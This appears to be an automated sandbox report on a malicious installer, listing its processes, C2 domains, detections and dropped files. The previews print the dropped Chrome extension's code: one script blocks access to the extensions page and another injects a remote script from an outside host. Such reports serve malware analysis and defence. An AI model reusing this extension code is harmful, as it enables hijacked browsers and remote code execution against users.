Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

Behavior Graph

Behavior Graph ID: 345937. Sample: FileSetup-v17.04.41.exe. Start date: 29/01/2021. Architecture: WINDOWS. Score: 90.

Signatures on the start node: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; Uses ping.exe to sleep; 3 other signatures.

Process tree recovered from the graph (graph node ids in parentheses; dropped files, DNS/IP contacts and signatures are listed under the node they belong to):

FileSetup-v17.04.41.exe (8)
  DNS/IP: 84cfba021a5a6662.xyz 104.21.23.16, ports 49725, 49730, 49731, CLOUDFLARENETUS, United States
  Dropped: C:\Users\user\...\6852B33702F6B3BD.exe (PE32); C:\...\6852B33702F6B3BD.exe:Zone.Identifier (ASCII)
  Signatures: Installs new ROOT certificates; Hides threads from debuggers
  6852B33702F6B3BD.exe (15)
    DNS/IP: 84cfba021a5a6662.xyz; 84CFBA021A5A6662.xyz
    Dropped: C:\Users\user\AppData\...\1611946678493.exe (PE32); C:\Users\user\AppData\Local\Temp\xldl.dll (PE32); C:\Users\user\AppData\Local\...\zlib1.dll (PE32); 7 other files (none is malicious)
    Signatures: Multi AV Scanner detection for dropped file; Detected unpacking (creates a PE file in dynamic memory); Machine Learning detection for dropped file; 4 other signatures
    cmd.exe (26)
      conhost.exe (42)
      PING.EXE (44)
    1611946678493.exe (29)
    ThunderFW.exe (31)
  6852B33702F6B3BD.exe (20)
    DNS/IP: 84cfba021a5a6662.xyz
    Dropped: C:\Users\user\AppData\...\Secure Preferences (UTF-8); C:\Users\user\AppData\Local\...\Preferences (ASCII)
    Signatures: Tries to harvest and steal browser information (history, passwords, etc)
    cmd.exe (33)
      Signatures: Uses ping.exe to sleep
      conhost.exe (46)
      PING.EXE (48)
    cmd.exe (35)
      taskkill.exe (50)
      conhost.exe (52)
  cmd.exe (22)
    DNS/IP: 127.0.0.1 unknown unknown
    Signatures: Uses ping.exe to sleep
    PING.EXE (37)
      DNS/IP: 192.168.2.1 unknown unknown
    conhost.exe (40)
  msiexec.exe (24)
    Dropped: C:\Users\user\AppData\Local\...\MSI61C2.tmp (PE32)
msiexec.exe (13)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
FileSetup-v17.04.41.exe | 61% | Virustotal |
FileSetup-v17.04.41.exe | 48% | ReversingLabs | Win32.PUA.KingSoft
FileSetup-v17.04.41.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe | 48% | ReversingLabs | Win32.PUA.KingSoft
C:\Users\user\AppData\Local\Temp\MSI61C2.tmp | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\MSI61C2.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 8% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\atl71.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\download_engine.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll | 3% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\download\zlib1.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\xldl.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\xldl.dll | 0% | ReversingLabs |

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
84CFBA021A5A6662.xyz | 1% | Virustotal |
84cfba021a5a6662.xyz | 1% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://84cfba021a5a6662.xyz/info_old/g | 1% | Virustotal |
http://84cfba021a5a6662.xyz/info_old/g | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/e | 1% | Virustotal |
http://84cfba021a5a6662.xyz/info_old/e | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/w | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
https://A5D4CE54CC78B3CA.xyz/ | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/info_old/r | 0% | Avira URL Cloud | safe
https://twitter.comsec-fetch-dest: | 0% | Avira URL Cloud | safe
http://www.interoperabilitybridges.com/wmp-extension-for-chrome | 0% | URL Reputation | safe
http://ocsp.pki.goog/gts1o1core0 | 0% | URL Reputation | safe
http://crl.pki.goog/GTS1O1core.crl0 | 0% | URL Reputation | safe
http://ocsp.pki.goog/GTSGIAG30 | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937 | 0% | Avira URL Cloud | safe
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5 | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/i | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/xet( | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0 | 0% | URL Reputation | safe
http://ocsp.pki.goog/gsr202 | 0% | URL Reputation | safe
https://pki.goog/repository/0 | 0% | URL Reputation | safe
http://crl.pki.goog/gsr2/gsr2.crl0? | 0% | URL Reputation | safe
http://pki.goog/gsr2/GTSGIAG3.crt0) | 0% | Avira URL Cloud | safe
https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: | 0% | Avira URL Cloud | safe
https://fsfba021a5a6662.xyz/ | 0% | Avira URL Cloud | safe
http://pki.goog/gsr2/GTS1O1.crt0# | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/info_old/ddd | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/info_old/wN | 0% | Avira URL Cloud | safe
https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info. | 0% | Avira URL Cloud | safe
http://84cfba021a5a6662.xyz/ | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/g | 0% | Avira URL Cloud | safe
https://www.instagram.comsec-fetch-mode: | 0% | Avira URL Cloud | safe
https://twitter.comReferer: | 0% | Avira URL Cloud | safe
http://www.interestvideo.com/video1.php | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/info_old/w& | 0% | Avira URL Cloud | safe
http://84CFBA021A5A6662.xyz/info_old/w% | 0% | Avira URL Cloud | safe
http://crl.pki.goog/GTSGIAG3.crl0 | 0% | Avira URL Cloud | safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- | --- | --- |
| 84CFBA021A5A6662.xyz | 104.21.23.16 | true | false | | unknown |
| 84cfba021a5a6662.xyz | 104.21.23.16 | true | false | | unknown |

Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
| --- | --- | --- | --- |
| http://84cfba021a5a6662.xyz/info_old/g | false | 1%, Virustotal; Avira URL Cloud: safe | unknown |
| http://84cfba021a5a6662.xyz/info_old/e | false | 1%, Virustotal; Avira URL Cloud: safe | unknown |
| http://84cfba021a5a6662.xyz/info_old/w | false | Avira URL Cloud: safe | unknown |
| http://84cfba021a5a6662.xyz/info_old/r | false | Avira URL Cloud: safe | unknown |
| http://84CFBA021A5A6662.xyz/info_old/ddd | false | Avira URL Cloud: safe | unknown |

URLs from Memory and Binaries


Contacted IPs


                                                                                                                                Public

IP: 104.21.23.16
Domain: unknown
Country: United States
ASN: 13335
ASN Name: CLOUDFLARENETUS
Malicious: false

                                                                                                                                Private

                                                                                                                                IP
                                                                                                                                192.168.2.1
                                                                                                                                127.0.0.1

                                                                                                                                General Information

                                                                                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                Analysis ID:345937
                                                                                                                                Start date:29.01.2021
                                                                                                                                Start time:10:56:38
                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                Overall analysis duration:0h 13m 24s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Sample file name:FileSetup-v17.04.41.exe
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                Run name:Run with higher sleep bypass
Number of new started processes analysed:40
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • HDC enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal90.bank.troj.spyw.evad.winEXE@32/37@4/3
                                                                                                                                EGA Information:Failed
                                                                                                                                HDC Information:
                                                                                                                                • Successful, ratio: 99.5% (good quality ratio 94.4%)
                                                                                                                                • Quality average: 79.8%
                                                                                                                                • Quality standard deviation: 27.4%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 61%
                                                                                                                                • Number of executed functions: 83
                                                                                                                                • Number of non-executed functions: 300
                                                                                                                                Cookbook Comments:
                                                                                                                                • Adjust boot time
                                                                                                                                • Enable AMSI
                                                                                                                                • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                Warnings:
                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 23.210.248.85, 51.104.144.132, 67.27.158.254, 8.248.139.254, 8.248.133.254, 8.253.204.121, 8.241.121.126, 95.101.22.224, 95.101.22.216, 8.253.204.120, 67.27.159.254, 67.27.157.126, 8.241.122.254, 8.241.122.126, 51.103.5.186, 20.54.26.129, 51.132.208.181, 52.155.217.156
                                                                                                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                No simulations

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

Match: 104.21.23.16
Associated Sample Name / URL: FileSetup-v17.04.41.exe
Detection: malicious
Context:
• 84CFBA021A5A6662.xyz/info_old/ddd

                                                                                                                                Domains

Match: 84cfba021a5a6662.xyz
Associated Sample Name / URL: FileSetup-v17.04.41.exe
Detection: malicious
Context:
• 104.21.23.16

                                                                                                                                ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL, Detection, Context:
• RddH6rLRfH.exe, malicious, 104.21.27.240
• Immuni.apk, malicious, 172.64.100.5
• FileSetup-v17.04.41.exe, malicious, 104.21.23.16
• UGPK60taH6.dll, malicious, 104.20.184.68
• 4PDNbYK5fj.exe, malicious, 172.67.169.213
• pmTdQ57tvM.exe, malicious, 172.67.169.213
• 7BtV39hziI.exe, malicious, 104.21.27.240
• dc4AaqW6Aa.exe, malicious, 104.21.27.240
• lAy87VNPiL.exe, malicious, 104.21.27.240
• 97aa4Ywd9y.exe, malicious, 104.21.27.240
• wuRBlQt0Tz.exe, malicious, 172.67.169.213
• 4GRuinub4a.exe, malicious, 172.67.169.213
• v8c1m9dW8G.exe, malicious, 172.67.169.213
• XQx9brj85p.exe, malicious, 172.67.169.213
• j64eIR1IEK.exe, malicious, 104.16.16.194
• k5K4BcM1b5.exe, malicious, 66.235.200.5
• J0nUka7d5M.exe, malicious, 104.21.27.240
• Swift_Confirmation.exe, malicious, 162.159.130.233
• VolP-Byungil.lim.HTM, malicious, 104.16.18.94
• order.exe, malicious, 172.67.188.154

                                                                                                                                JA3 Fingerprints

                                                                                                                                No context

                                                                                                                                Dropped Files

Match (dropped file), Associated Sample Name / URL, Detection:
• C:\Users\user\AppData\Local\Temp\MSI61C2.tmp, FileSetup-v17.04.41.exe, malicious
• C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe, FileSetup-v17.04.41.exe, malicious
• C:\Users\user\AppData\Local\Temp\download\atl71.dll, FileSetup-v17.04.41.exe, malicious
• C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe, FileSetup-v17.04.41.exe, malicious
• C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe, FileSetup-v17.04.41.exe, malicious

                                                                                                                                          Created / dropped Files

                                                                                                                                          C:\Users\user\AppData\Local\Cookies1611946677837
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.6970840431455908
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                          MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                          SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                          SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                          SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                          Malicious:false
Preview: SQLite format 3 (the rest of the preview is non-printable binary and is not reproduced)
                                                                                                                                          C:\Users\user\AppData\Local\Cookies1611946694149
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):20480
                                                                                                                                          Entropy (8bit):0.6970840431455908
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                          MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                          SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                          SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                          SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                          Malicious:false
Preview: SQLite format 3 (the rest of the preview is non-printable binary and is not reproduced)
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\background.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):886
                                                                                                                                          Entropy (8bit):5.022683940423506
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                          MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                          SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                          SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                          SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                          Malicious:false
Preview (reflowed; the original report shows line breaks and indentation as "."):
    $(function() {
        chrome.tabs.onSelectionChanged.addListener(function(tab,info){
            chrome.tabs.query({
                active : true
            }, function(tab) {
                var pageUrl = tab[0].url;
                console.log(pageUrl);
                if (Number(pageUrl.indexOf("extensions")) > 1)
                {
                    chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'});
                }
            });
        });

        chrome.webRequest.onBeforeRequest.addListener(function(details) {
            chrome.tabs.query({
                active : true
            }, function(tab) {
                var pageUrl = tab[0].url;
            });

            var url = details.url;
        }, {
            urls : [ "<all_urls>" ]
        }, [ "blocking" ]);

        function sendMessageToContentScript(message, callback) {
            chrome.tabs.query({
                active : true,
                currentWindow : true
            }, function(tabs) {
                chrome.tabs.sendMessage(tabs[0].id, message, function(response) {
                    if (callback)
                        callback(response);
                });
            });
        }
    });
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\book.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):152
                                                                                                                                          Entropy (8bit):5.039480985438208
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                          MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                          SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                          SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                          SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon.png
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1161
                                                                                                                                          Entropy (8bit):7.79271055262892
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                          MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                          SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                          SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                          SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\icon48.png
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2235
                                                                                                                                          Entropy (8bit):7.880518016071819
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                          MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                          SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                          SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                          SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93637
                                                                                                                                          Entropy (8bit):5.292996107428883
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                          MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                          SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                          SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                          SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
                                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\canopdahbphflpoibdjjgahoedkbdncm\1.0.0.0_0\manifest.json
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2380
                                                                                                                                          Entropy (8bit):5.687293760500434
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
                                                                                                                                          MD5:ADF10776EEC8DC0F6E7E3B4AD59CF504
                                                                                                                                          SHA1:4F11FE569189036B42923EF5A8AFB0985DCECDF5
                                                                                                                                          SHA-256:ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
                                                                                                                                          SHA-512:7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
                                                                                                                                          Malicious:false
